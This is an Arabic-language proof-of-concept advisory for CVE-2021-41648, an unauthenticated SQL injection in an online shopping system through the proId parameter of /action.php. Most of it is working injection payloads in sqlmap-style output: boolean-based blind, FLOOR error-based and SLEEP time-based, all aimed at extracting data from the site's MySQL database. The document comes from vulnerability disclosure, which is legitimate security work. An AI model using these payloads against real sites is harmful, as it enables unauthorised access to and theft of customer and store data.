
أداة استغلال (Proof-of-concept) لثغرة حقن SQL غير مصادق عليها في نظام التسوق الإلكتروني عبر وسيط proId، مما يتيح استخراج البيانات من قاعدة بيانات MySQL.
CVE-2021-41648 حقن SQL في نظام التسوق عبر الإنترنت
نظام التسوق عبر الإنترنت عرضة لهجمات حقن SQL العمياء المستندة إلى الأخطاء/المنطقية غير المصادق عليها والهجمات المستندة إلى الأخطاء.
لا يقوم معامل proId في صفحة /action.php بتطهير إدخال المستخدم، مما يسمح للمهاجم باستخراج بيانات حساسة من قاعدة بيانات MySQL الأساسية.
URL: /action.php
المعامل: proId
المعامل: proId (POST)
النوع: أعمى قائم على المنطق (boolean-based blind)
العنوان: OR أعمى قائم على المنطق - عبارة WHERE أو HAVING (NOT - تعليق MySQL)
الحمولة: proId=61 OR 17-7=10' OR NOT 4774=4774#&addToCart=1
النوع: قائم على الخطأ (error-based)
العنوان: MySQL >= 5.0 OR قائم على الخطأ - WHERE, HAVING, ORDER BY أو GROUP BY (FLOOR)
الحمولة: proId=61 OR 17-7=10' OR (SELECT 6869 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6869=6869,1))),0x716a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gfTu&addToCart=1
النوع: أعمى قائم على الوقت (time-based blind)
العنوان: MySQL >= 5.0.12 AND أعمى قائم على الوقت (استعلام SLEEP)
الحمولة: proId=61 OR 17-7=10' AND (SELECT 2990 FROM (SELECT(SLEEP(5)))YhWy)-- xWNo&addToCart=1

Jason Colyvas
MOBIUSBINARY
21 سبتمبر 2021